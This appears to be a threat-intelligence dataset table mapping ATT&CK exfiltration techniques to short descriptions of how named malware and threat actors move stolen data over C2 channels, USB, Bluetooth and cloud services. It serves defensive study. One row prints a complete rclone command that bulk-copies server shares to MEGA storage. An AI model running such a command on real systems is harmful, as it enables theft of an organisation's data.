prompt
stringclasses 508
values | procedure
stringlengths 20
478
|
---|---|
Exfiltration Over C2 Channel | Lokibot has the ability to initiate contact with command and control (C2) to exfiltrate stolen data. |
Exfiltration Over C2 Channel | It has used malware that exfiltrates stolen data to its C2 server. |
Exfiltration Over C2 Channel | It's collected data is exfiltrated over the same channel used for C2. |
Exfiltration Over C2 Channel | MacMa exfiltrates data from a supplied path over its C2 channel. |
Exfiltration Over C2 Channel | Mafalda can send network system data and files to its C2 server. |
Exfiltration Over C2 Channel | MarkiRAT can exfiltrate locally stored data via its C2. |
Exfiltration Over C2 Channel | MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2. |
Exfiltration Over C2 Channel | metaMain can upload collected files and data to its C2 server. |
Exfiltration Over C2 Channel | Metamorfo can send the data it collects to the C2 server. |
Exfiltration Over C2 Channel | Mis-Type has transmitted collected files and data to its C2 server. |
Exfiltration Over C2 Channel | Misdat has uploaded files and data to its C2 servers. |
Exfiltration Over C2 Channel | MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications. |
Exfiltration Over C2 Channel | Mongall can upload files and information from a compromised host to its C2 server. |
Exfiltration Over C2 Channel | It has used C2 infrastructure to receive exfiltrated data. |
Exfiltration Over C2 Channel | NETEAGLE is capable of reading files over the C2 channel. |
Exfiltration Over C2 Channel | NightClub can use SMTP and DNS for file exfiltration and C2. |
Exfiltration Over C2 Channel | njRAT has used HTTP to receive stolen information from the infected machine. |
Exfiltration Over C2 Channel | Octopus has uploaded stolen files and data from a victim's machine over its C2 channel. |
Exfiltration Over C2 Channel | Data exfiltration is done by Okrum using the already opened channel with the C2 server. |
Exfiltration Over C2 Channel | OopsIE can upload files from the victim's machine to its C2 server. |
Exfiltration Over C2 Channel | During Operation Dream Job, It exfiltrated data from a compromised host to actor-controlled C2 servers. |
Exfiltration Over C2 Channel | During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers. |
Exfiltration Over C2 Channel | During Operation Wocao, threat actors used the XServer backdoor to exfiltrate data. |
Exfiltration Over C2 Channel | OutSteel can upload files from a compromised host over its C2 channel. |
Exfiltration Over C2 Channel | PcShare can upload files and information from a compromised host to its C2 servers. |
Exfiltration Over C2 Channel | Penquin can execute the command code do_upload to send files to C2. |
Exfiltration Over C2 Channel | PingPull has the ability to exfiltrate stolen victim data through its C2 channel. |
Exfiltration Over C2 Channel | PoetRAT has exfiltrated data over the C2 channel. |
Exfiltration Over C2 Channel | PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days. |
Exfiltration Over C2 Channel | Proxysvc performs data exfiltration over the control server channel using a custom protocol. |
Exfiltration Over C2 Channel | Psylo exfiltrates data to its C2 server over the same protocol as C2 communications. |
Exfiltration Over C2 Channel | Pteranodon exfiltrates screenshot files to its C2 server. |
Exfiltration Over C2 Channel | Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server. |
Exfiltration Over C2 Channel | QakBot can send stolen information to C2 nodes including passwords, accounts, and emails. |
Exfiltration Over C2 Channel | RDAT can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel. |
Exfiltration Over C2 Channel | Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel. |
Exfiltration Over C2 Channel | REvil can exfiltrate host and malware information to C2 servers. |
Exfiltration Over C2 Channel | Rising Sun can send data gathered from the infected machine via HTTP POST request to the C2. |
Exfiltration Over C2 Channel | ROKRAT can send collected files back over same C2 channel. |
Exfiltration Over C2 Channel | RotaJakiro sends device and other collected data back to the C2 using the established C2 channels over TCP. |
Exfiltration Over C2 Channel | S-Type has uploaded data and files from a compromised host to its C2 servers. |
Exfiltration Over C2 Channel | It has sent system information to its C2 server using HTTP. |
Exfiltration Over C2 Channel | SDBbot has sent collected data from a compromised host to its C2 servers. |
Exfiltration Over C2 Channel | Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel. |
Exfiltration Over C2 Channel | SharpDisco can load a plugin to exfiltrate stolen files to SMB shares also used in C2. |
Exfiltration Over C2 Channel | ShimRatReporter sent generated reports to the C2 via HTTP POST requests. |
Exfiltration Over C2 Channel | SideTwist has exfiltrated data over its C2 channel. |
Exfiltration Over C2 Channel | SILENTTRINITY can transfer files from an infected host to the C2 server. |
Exfiltration Over C2 Channel | Sliver can exfiltrate files from the victim using the download command. |
Exfiltration Over C2 Channel | SLOTHFULMEDIA has sent system information to a C2 server via HTTP and HTTPS POST requests. |
Exfiltration Over C2 Channel | SMOKEDHAM has exfiltrated data to its C2 server. |
Exfiltration Over C2 Channel | SombRAT has uploaded collected data and files from a compromised host to its C2 server. |
Exfiltration Over C2 Channel | Spark has exfiltrated data over the C2 channel. |
Exfiltration Over C2 Channel | Squirrelwaffle has exfiltrated victim data using HTTP POST requests to its C2 servers. |
Exfiltration Over C2 Channel | STARWHALE can exfiltrate collected data to its C2 servers. |
Exfiltration Over C2 Channel | After data is collected by It malware, it is exfiltrated over the existing C2 channel. |
Exfiltration Over C2 Channel | StrifeWater can send data and files from a compromised host to its C2 server. |
Exfiltration Over C2 Channel | StrongPity can exfiltrate collected documents through C2 channels. |
Exfiltration Over C2 Channel | Stuxnet sends compromised victim information via HTTP. |
Exfiltration Over C2 Channel | SUGARDUMP has sent stolen credentials and other data to its C2 server. |
Exfiltration Over C2 Channel | SVCReady can send collected data in JSON format to its C2 server. |
Exfiltration Over C2 Channel | SysUpdate has exfiltrated data over its C2 channel. |
Exfiltration Over C2 Channel | TajMahal has the ability to send collected files over its C2. |
Exfiltration Over C2 Channel | ThiefQuest exfiltrates targeted file extensions in the /Users/ folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string. |
Exfiltration Over C2 Channel | Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server. |
Exfiltration Over C2 Channel | Torisma can send victim data to an actor-controlled C2 server. |
Exfiltration Over C2 Channel | TrickBot can send information about the compromised host and upload data to a hardcoded C2 server. |
Exfiltration Over C2 Channel | Ursnif has used HTTP POSTs to exfil gathered information. |
Exfiltration Over C2 Channel | Valak has the ability to exfiltrate data over the C2 channel. |
Exfiltration Over C2 Channel | WarzoneRAT can send collected victim data to its C2 server. |
Exfiltration Over C2 Channel | It has exfiltrated domain credentials and network enumeration information over command and control (C2) channels. |
Exfiltration Over C2 Channel | Woody RAT can exfiltrate files from an infected machine to its C2 server. |
Exfiltration Over C2 Channel | XCSSET exfiltrates data stolen from a system over its C2 channel. |
Exfiltration Over C2 Channel | Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests. |
Exfiltration Over C2 Channel | ItM has exfiltrated files via the Dropbox API C2. |
Exfiltration Over C2 Channel | ZLib has sent data and files from a compromised host to its C2 servers. |
Exfiltration Over Other Network Medium:Exfiltration Over Bluetooth | Flame has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity. |
Exfiltration Over Physical Medium:Exfiltration over USB | Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs. |
Exfiltration Over Physical Medium:Exfiltration over USB | It has a feature to copy files from every drive onto a removable drive in a hidden folder. |
Exfiltration Over Physical Medium:Exfiltration over USB | It has used a customized PlugX variant which could exfiltrate documents from air-gapped networks. |
Exfiltration Over Physical Medium:Exfiltration over USB | Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device. |
Exfiltration Over Physical Medium:Exfiltration over USB | SPACESHIP copies staged data to removable drives when they are inserted into the system. |
Exfiltration Over Physical Medium:Exfiltration over USB | It has exfiltrated data using USB storage devices. |
Exfiltration Over Physical Medium:Exfiltration over USB | USBStealer exfiltrates collected files via removable media from air-gapped victims. |
Exfiltration Over Web Service | AppleSeed has exfiltrated files using web services. |
Exfiltration Over Web Service | It can exfiltrate data over Google Drive. |
Exfiltration Over Web Service | During C0017, It used Cloudflare services for data exfiltration. |
Exfiltration Over Web Service | DropBook has used legitimate web services to exfiltrate data. |
Exfiltration Over Web Service | It has used the Telegram API sendMessage to relay data on compromised devices. |
Exfiltration Over Web Service | ngrok has been used by threat actors to configure servers for data exfiltration. |
Exfiltration Over Web Service:Exfiltration to Code Repository | Empire can use GitHub for data exfiltration. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | BoomBox can upload data to dedicated per-victim folders in Dropbox. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | It has exfiltrated stolen data to OneDrive accounts. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | Clambling can send files from a victim's machine to Dropbox. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | It has exfiltrated victim data to cloud storage service accounts. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | CreepyDrive can use cloud services including OneDrive for data exfiltration. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | Crutch has exfiltrated stolen data to Dropbox. |
Exfiltration Over Web Service:Exfiltration to Cloud Storage | It has used the megacmd tool to upload stolen files from a victim network to MEGA. |